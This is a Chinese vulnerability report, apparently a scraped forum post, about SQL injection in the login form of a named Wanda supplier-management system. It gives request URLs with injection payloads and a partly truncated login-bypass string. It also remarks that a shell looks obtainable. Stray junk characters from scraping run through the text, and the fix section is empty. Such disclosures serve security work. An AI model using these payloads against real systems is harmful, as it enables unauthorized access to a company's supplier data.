万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
详细说明：
8 c8 Q2 e1 j* U/ V万达scm系统登陆框sql注入。
1 }' R, @$ ]& C: y0 E
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27


; A5 r8 ?  f+ C6 }; t500错误。

用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
* ?( j# C) p4 \2 ?# l& u经过分析，登陆验证的过程应该是：
( y0 j, a. {' G. d' C  L; k
取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
5 o  M/ z4 j4 q- D+ \" Y5 b* Z
oracle数据库，存在注入点。@大连万达，你怎么看？
2 t5 v9 `4 |1 x9 rhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

$ V& g' Z$ X  Q系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
! x  I" R8 K/ k7 M2 x  _漏洞证明：
万达scm系统登陆框sql注入。
' F8 L3 C( H2 g
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
( D+ {7 q1 o, ~6 y; _2 F: o. B
4 r: u+ L! G3 v+ E
, p! B4 n) @8 |% b8 Q5 s9 \/ j5 R# j500错误。

# l& W: ^. z! M. E# r2 W用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
; |0 a; _8 b; C& s" ~4 o1 Shttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png

1 k  _0 M& _% a, ?, B, K
; g, k6 U8 T6 d4 s  ?3 O6 w（截图有一点问题）

怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
9 l) g5 ?- T. X. c5 |# `, ~
绕过：
5 r( c+ ]4 G2 a) b, p" t, _http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1

- L' R( \& e% J9 z; E
oracle数据库，存在注入点。@大连万达，你怎么看？
4 D. q% D! c* z4 Y2 h​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。
* Q: ]: [! {1 k, J, M2 W9 F
修复方案：
* o1 v; `+ ~+ o- ]. r/ \7 z+ V。。。
) l7 E; n( {" V6 [  ~4 c

厂商已经确认
4 X9 C8 z7 F8 l. {1 G
( S0 t8 ?( R) n! g5 `; J# N7 G  ^. R' J[/td][/tr]
[/table]
+ N/ e4 v8 l! B: L# y; o! d
2 T9 c, s: U& b- m8 }4 J! y" s